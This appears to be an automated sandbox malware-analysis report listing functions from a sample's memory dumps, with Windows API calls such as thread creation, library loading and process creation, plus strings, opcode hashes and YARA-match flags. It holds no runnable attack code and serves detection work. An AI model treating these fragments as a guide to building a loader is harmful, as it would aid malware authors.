                                                            Function 02E039B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 0b015587a85ab0718299b6ab8fb76f084aa2cb2770f275d20f0d44f896e7c017
                                                            • Instruction ID: 3e4faa8c8ece4ab06fe1215176301085c56cb3d8869e22c58ca324f4b3f1edb0
                                                            • Opcode Fuzzy Hash: 0b015587a85ab0718299b6ab8fb76f084aa2cb2770f275d20f0d44f896e7c017
                                                            • Instruction Fuzzy Hash: 849002312C545103E590B15C44056175005A7E1201F95D031A0814598D86558955A221
                                                            Function 00500C88 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63threadwindowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 420 500c88-500ca1 421 500ca3-500ca9 420->421 422 500d0a-500d5a call 51bec0 call 504460 call 4f1410 call 511b60 420->422 421->422 425 500c7e-500c80 421->425 433 500d7a-500d80 422->433 434 500d5c-500d6b PostThreadMessageW 422->434 425->420 434->433 435 500d6d-500d77 434->435 435->433
                                                            APIs
                                                            • PostThreadMessageW.USER32(0349A-n,00000111,00000000,00000000), ref: 00500D67
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_4f0000_fc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID: 0349A-n$0349A-n
                                                            • API String ID: 1836367815-3456940251
                                                            • Opcode ID: 1f76030872995a119fffb4dcd4e743c2c3515c92a5214d54dff2c5de1486bb0e
                                                            • Instruction ID: 4271cdd7778a996abb306de4a4815256c56e77b094e53b3fa093cfcee54fc0c4
                                                            • Opcode Fuzzy Hash: 1f76030872995a119fffb4dcd4e743c2c3515c92a5214d54dff2c5de1486bb0e
                                                            • Instruction Fuzzy Hash: 6311297390015D76EB119BE18C41EEFBF2CBF81794F048145FA4867181D6355D4687E1
                                                            Function 00500CF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 436 500cf0-500d5a call 51b4b0 call 51bec0 call 504460 call 4f1410 call 511b60 447 500d7a-500d80 436->447 448 500d5c-500d6b PostThreadMessageW 436->448 448->447 449 500d6d-500d77 448->449 449->447
                                                            APIs
                                                            • PostThreadMessageW.USER32(0349A-n,00000111,00000000,00000000), ref: 00500D67
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_4f0000_fc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID: 0349A-n$0349A-n
                                                            • API String ID: 1836367815-3456940251
                                                            • Opcode ID: 56bde2b1104ceae008f594fe1d489f19974fe1a0a03902dd4b39c10a86ac2cbc
                                                            • Instruction ID: 78d51e98977b4ee434a30249b94d068c91bdbe96f50aa8ab27e7bc11e55bc169
                                                            • Opcode Fuzzy Hash: 56bde2b1104ceae008f594fe1d489f19974fe1a0a03902dd4b39c10a86ac2cbc
                                                            • Instruction Fuzzy Hash: 96019B72D4021D7AEB11ABE58C81EEF7F7CEF81794F048054FA0467181D6795D0647B1
                                                            Function 00500CAC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 450 500cac-500cb8 450->450 451 500cba-500cbd 450->451 452 500d20-500d22 451->452 453 500cbf-500cc9 451->453 454 500d28-500d5a call 4f1410 call 511b60 452->454 455 500d23 call 504460 452->455 453->452 460 500d7a-500d80 454->460 461 500d5c-500d6b PostThreadMessageW 454->461 455->454 461->460 462 500d6d-500d77 461->462 462->460
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_4f0000_fc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 0349A-n$0349A-n
                                                            • API String ID: 0-3456940251
                                                            • Opcode ID: 03523de330cbb778cc34fa964ff4b6dde63fe6781dc13765c5006d6863283d36
                                                            • Instruction ID: 8388adcf38a8ee1051c9809166ed9ed3fbbe1ff5385b3258ac9d2ed683982939
                                                            • Opcode Fuzzy Hash: 03523de330cbb778cc34fa964ff4b6dde63fe6781dc13765c5006d6863283d36
                                                            • Instruction Fuzzy Hash: DD0147B6901149BEDF119BB54C81ABF6F6CFFD2798F048091F540E7181D5244D0287B6
                                                            Function 00513A10 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Sleep.KERNELBASE(000007D0), ref: 00513AEB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_4f0000_fc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID: net.dll$wininet.dll
                                                            • API String ID: 3472027048-1269752229
                                                            • Opcode ID: 708f5f20b7e7496beebeb298c6498da1c5483fec13b86b3fd29b4a45f348fd50
                                                            • Instruction ID: 58a5f30463a0f9d7deea80c9b86b92e54856aff290b83936b17d6882e4c57d70
                                                            • Opcode Fuzzy Hash: 708f5f20b7e7496beebeb298c6498da1c5483fec13b86b3fd29b4a45f348fd50
                                                            • Instruction Fuzzy Hash: 61318FB1600605BBE714DF64CC95FEBBBB8FB88704F10455DE619AB241D7706A80CBA4
                                                            Function 0050F429 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 103COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_4f0000_fc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: InitializeUninitialize
                                                            • String ID: @J7<
                                                            • API String ID: 3442037557-2016760708
                                                            • Opcode ID: 6ff67cc44ea29b663d8a00fcdba15c28879c7a63330304db09f29e75e2b87ff3
                                                            • Instruction ID: baf43261291daf24706062f8618530c8ec7f68c05625ed230a7c738b0bb5471d
                                                            • Opcode Fuzzy Hash: 6ff67cc44ea29b663d8a00fcdba15c28879c7a63330304db09f29e75e2b87ff3
                                                            • Instruction Fuzzy Hash: 26316175A0020AAFDB10DFD8DC809EFB7B9FF88304B108559E515A7254D775EE45CBA0
                                                            Function 0050F430 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_4f0000_fc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: InitializeUninitialize
                                                            • String ID: @J7<
                                                            • API String ID: 3442037557-2016760708
                                                            • Opcode ID: f3e160a9f1e899d13c39d3ff7a73cf50051c7985fc115966b4742201c8117501
                                                            • Instruction ID: bf94281b44da5019ca17c9dac22fe83ae5e8054e671e55575b3b49438e3250d1
                                                            • Opcode Fuzzy Hash: f3e160a9f1e899d13c39d3ff7a73cf50051c7985fc115966b4742201c8117501
                                                            • Instruction Fuzzy Hash: 0C3150B5A0020AAFDB10DFD8DC809EFB7B9BF88304B108559E905EB254D775EE458BA0
                                                            Function 00519660 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0051969C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_4f0000_fc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID: 2P
                                                            • API String ID: 3298025750-1959614785
                                                            • Opcode ID: 2c7d0e8fa14e5537e8920ab20e4117eb7134f7dcb1150b0d78b0cb26355729ad
                                                            • Instruction ID: 2804a066b872445903c1e1be8ec5fa7d977c08295f50dcdba56cc23e2dbd5bb6
                                                            • Opcode Fuzzy Hash: 2c7d0e8fa14e5537e8920ab20e4117eb7134f7dcb1150b0d78b0cb26355729ad
                                                            • Instruction Fuzzy Hash: D0E06D712042057BD610EE59DC45FAB37ACEFC8750F004419F909A7242D770BD118BB5
                                                            Function 005082D0 Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_4f0000_fc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 56fdaf67af26a89d48321f54bdb37335752dedbf55b023a22c9891b34d3e6fed
                                                            • Instruction ID: ae0ac693c0a0bc09100c20afafb5e599a4a2b268e09847b6c0ac6f3f8c90be2c
                                                            • Opcode Fuzzy Hash: 56fdaf67af26a89d48321f54bdb37335752dedbf55b023a22c9891b34d3e6fed
                                                            • Instruction Fuzzy Hash: BF21A07A00DA962BE7219A344C01AF67F59FB63314B694A5CD9D2572D2CE12D80B82C1
                                                            Function 00508279 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 005082AC
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_4f0000_fc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: ae725d5d1022276922e887530209a410d5b39521f7ed0366200988ba5edd385e
                                                            • Instruction ID: 1cf74ca9b9a2e87ebfbd9675000925b08b783e9f59df3c79b5edea9e4d6c4e77
                                                            • Opcode Fuzzy Hash: ae725d5d1022276922e887530209a410d5b39521f7ed0366200988ba5edd385e
                                                            • Instruction Fuzzy Hash: 4A017B7A606A4516E720A2789C4AFBDBF54BF45338F0847E8F9988B2D3E664D5028281
                                                            Function 00504460 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 005044D2
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_4f0000_fc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Load
                                                            • String ID:
                                                            • API String ID: 2234796835-0
                                                            • Opcode ID: 398b2a412e78966941bbc00af36c1ba151ff0cffd571e2978ca56ccaa8df4b4d
                                                            • Instruction ID: ca788905772ee05095ad3a07635baa43ce2c751b0717232a50ae9e241f6a87af
                                                            • Opcode Fuzzy Hash: 398b2a412e78966941bbc00af36c1ba151ff0cffd571e2978ca56ccaa8df4b4d
                                                            • Instruction Fuzzy Hash: 56011EB5D4020EABEF10DAE4DC46FDDBB78AB54308F044195AA0897281F635EB59CB91
                                                            Function 005196F0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateProcessInternalW.KERNELBASE(?,?,?,?,0050823E,00000010,?,?,?,00000044,?,00000010,0050823E,?,?,?), ref: 00519753
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_4f0000_fc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateInternalProcess
                                                            • String ID:
                                                            • API String ID: 2186235152-0
                                                            • Opcode ID: 016bd8ce1746197e8720e3a876af95e62b55fcc460ffb57a2bf48c7dd99eb0d8
                                                            • Instruction ID: 6bf24f5dd470bcc2d5541cb07a053334637e4484535777f0d130bd61dddcaf11
                                                            • Opcode Fuzzy Hash: 016bd8ce1746197e8720e3a876af95e62b55fcc460ffb57a2bf48c7dd99eb0d8
                                                            • Instruction Fuzzy Hash: D701C0B2204108BFCB04DE99DC81EEB77ADAFCC714F418209BA09E3241D630F8518BA4
                                                            Function 004F9CA0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 004F9CE5
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_4f0000_fc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateThread
                                                            • String ID:
                                                            • API String ID: 2422867632-0
                                                            • Opcode ID: 81bed8db2255a654e2e4f5805a192615afbdbb60f304de946e01026b61b93252
                                                            • Instruction ID: bdbf11f31c5cff3bf9ebbaf876be411f9a8534b2c59e19126372cca2c12902d6
                                                            • Opcode Fuzzy Hash: 81bed8db2255a654e2e4f5805a192615afbdbb60f304de946e01026b61b93252
                                                            • Instruction Fuzzy Hash: 67F0653338061836F22065AA9C03FE7769CDBC0B65F14042AFB1CEB2C1D996B84146A8
                                                            Function 004F9C9A Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 004F9CE5
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_4f0000_fc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateThread
                                                            • String ID:
                                                            • API String ID: 2422867632-0
                                                            • Opcode ID: 55c12ee0478bd197b30b76699c9a20714714125b54a48bb0ad2dbbf9c5c8d5a6
                                                            • Instruction ID: d83933d10aaedd20714c214d0675f4bbfa30c549519aa597ca7b566431d7f9b9
                                                            • Opcode Fuzzy Hash: 55c12ee0478bd197b30b76699c9a20714714125b54a48bb0ad2dbbf9c5c8d5a6
                                                            • Instruction Fuzzy Hash: 4BF065762C070577F220A695CC43FE7769CDF84B64F140019FB18AB2C1D6A5784187A8
                                                            Function 00504453 Relevance: 1.5, APIs: 1, Instructions: 29libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 005044D2
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_4f0000_fc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Load
                                                            • String ID:
                                                            • API String ID: 2234796835-0
                                                            • Opcode ID: 8aef7e6dee978ff0a08f23e338e06f373b0ad360bf5dbdfaa9cc84fad5eece04
                                                            • Instruction ID: 004ed504acdd1798fb26e284762debf70650329cefd6735c738c33cdfa2f95b8
                                                            • Opcode Fuzzy Hash: 8aef7e6dee978ff0a08f23e338e06f373b0ad360bf5dbdfaa9cc84fad5eece04
                                                            • Instruction Fuzzy Hash: 80F01CF6E4410AABDF10CBD4DC92FEDBB74AF54308F108195E6089A281E635EA55CF51
                                                            Function 00519610 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00501969,?,00515DDF,00501969,005155FF,00515DDF,?,00501969,005155FF,00001000,?,?,00000000), ref: 0051964C
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_4f0000_fc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 7b7813cea5ecf29619ebb5f332fdfad85baad263fae7f034d9bc4f129238223b
                                                            • Instruction ID: b24c01eb3b92abe7fde122217a21148484c3a0c38fe31521485c7ef0e32df4ea
                                                            • Opcode Fuzzy Hash: 7b7813cea5ecf29619ebb5f332fdfad85baad263fae7f034d9bc4f129238223b
                                                            • Instruction Fuzzy Hash: 65E06DB12042097BDA10EE59DC41F9B37ADEFC4714F004009FA0CA7241D675BC108AB9
                                                            Function 00508280 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 005082AC
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_4f0000_fc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 5a49965b76113d7eba8950a62bf73d699cb455ede4163327e3b47103c27001a1
                                                            • Instruction ID: 66904b0c0cbd6270361d80470e332fe1fad7ad378225709ae8cdd52fdc654cab
                                                            • Opcode Fuzzy Hash: 5a49965b76113d7eba8950a62bf73d699cb455ede4163327e3b47103c27001a1
                                                            • Instruction Fuzzy Hash: 84E0203920060817F72065A8DC45FF5335C6744724F0D0550BD5CCB2C1E574F8418154
                                                            Function 00508069 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNELBASE(00008003,?,?,00501C70,00517F3E,005155FF,00501C36), ref: 005080A3
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_4f0000_fc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorMode
                                                            • String ID:
                                                            • API String ID: 2340568224-0
                                                            • Opcode ID: 41c98a09423e25b3d80bc38189e147eb8eba39a4a8001bd81624460b1773707e
                                                            • Instruction ID: 364d6b76719f2817f4d743e25a4900722451c8ba39723637cbc7c5d23b10d685
                                                            • Opcode Fuzzy Hash: 41c98a09423e25b3d80bc38189e147eb8eba39a4a8001bd81624460b1773707e
                                                            • Instruction Fuzzy Hash: 5DE0C2316402086FFA20EBF4EC27FE9325C6B80354F0444A4BA0CE72C2E975A4518669
                                                            Function 00508070 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNELBASE(00008003,?,?,00501C70,00517F3E,005155FF,00501C36), ref: 005080A3
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_4f0000_fc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorMode
                                                            • String ID:
                                                            • API String ID: 2340568224-0
                                                            • Opcode ID: 1881ecda90284090cb91987cf95af106e8e22d83d3344d8cc80dfc5dee4a4a96
                                                            • Instruction ID: 821cfd71456ec447b3e7711f6ab847df5c84cf206bf9875ed73bd8a560735fde
                                                            • Opcode Fuzzy Hash: 1881ecda90284090cb91987cf95af106e8e22d83d3344d8cc80dfc5dee4a4a96
                                                            • Instruction Fuzzy Hash: 57D05E712403087BF610A6E5DC2BFA6368C6B40754F0444A5BA4CE72C2E966F45081A9
                                                            Function 02E02C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 60d2253336c8b1ac7b5e273e60cf18fa84ec33592520c94e83498eb7f576745e
                                                            • Instruction ID: 92fa6b90429d0454ae59e3c0afc9a60b75fd0dd675e942ff374d2421faf88218
                                                            • Opcode Fuzzy Hash: 60d2253336c8b1ac7b5e273e60cf18fa84ec33592520c94e83498eb7f576745e
                                                            • Instruction Fuzzy Hash: 62B09B719815C5C6EE51E7604A4D717794067D1705F55D075D3030685E4738C1D1F175

                                                            Non-executed Functions

                                                            Function 02C904DE Relevance: .1, Instructions: 149COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141053142.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2c90000_fc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 025498aec11dcda84dc733139c27437218ec7e81399a40a62fefcf4651d99b5c
                                                            • Instruction ID: c39aa2075fbb8c0f153dd3f71b3f12a20abcc690488c169ba7ff9cec491db4a3
                                                            • Opcode Fuzzy Hash: 025498aec11dcda84dc733139c27437218ec7e81399a40a62fefcf4651d99b5c
                                                            • Instruction Fuzzy Hash: E441277161CB0D4FD768EF689085277B3F2FB88300F50052ED98AC3252EB74E8428B89
                                                            Function 02C9DCE0 Relevance: 56.5, Strings: 45, Instructions: 223COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141053142.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2c90000_fc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                            • API String ID: 0-3558027158
                                                            • Opcode ID: 73a9b7ed546a24be3e9317f37fdc970f6a216d0c2b4184c2805cffff4e0ed5c2
                                                            • Instruction ID: 31b4e2ab106822b423daaf0bb677166ac50d8b2c79b8946da12a38d6a97a4b3f
                                                            • Opcode Fuzzy Hash: 73a9b7ed546a24be3e9317f37fdc970f6a216d0c2b4184c2805cffff4e0ed5c2
                                                            • Instruction Fuzzy Hash: C99142F04082948ACB158F55A0652AFFFB1EBC6305F15816DE7E6BB243C3BE8945CB85
                                                            Function 02E02890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                            • API String ID: 48624451-2108815105
                                                            • Opcode ID: fefc80f80625b4db6764f39cb273aab24330e27a2b4d334905eaea2b253f3dcd
                                                            • Instruction ID: 93262f45c8519bff3f35f0ed234148194457d5c939b2e8cbbebde51dbba3a5fc
                                                            • Opcode Fuzzy Hash: fefc80f80625b4db6764f39cb273aab24330e27a2b4d334905eaea2b253f3dcd
                                                            • Instruction Fuzzy Hash: 1F5105B6A40116BFDB11DBA8C8D497EF7F8BB08204750D269F995D3680D334DE81CBA0
                                                            Function 02E72410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                            • API String ID: 48624451-2108815105
                                                            • Opcode ID: 1e5a32992669129d3ae260dcce9d4422c44bc0f4da1cf63c64fa8c8179af435a
                                                            • Instruction ID: 5b8e37a4aff44ac8a64336cba2aac3981c70478fd9f7cc289d9654b995302169
                                                            • Opcode Fuzzy Hash: 1e5a32992669129d3ae260dcce9d4422c44bc0f4da1cf63c64fa8c8179af435a
                                                            • Instruction Fuzzy Hash: 32510475A80645AEDB30DE9CC8A09BFB7F9EF44204B00D469FA96C3641E774EE40CB60
                                                            Function 02DF7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • ExecuteOptions, xrefs: 02E346A0
                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02E34655
                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02E34725
                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 02E34787
                                                            • Execute=1, xrefs: 02E34713
                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02E34742
                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02E346FC
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
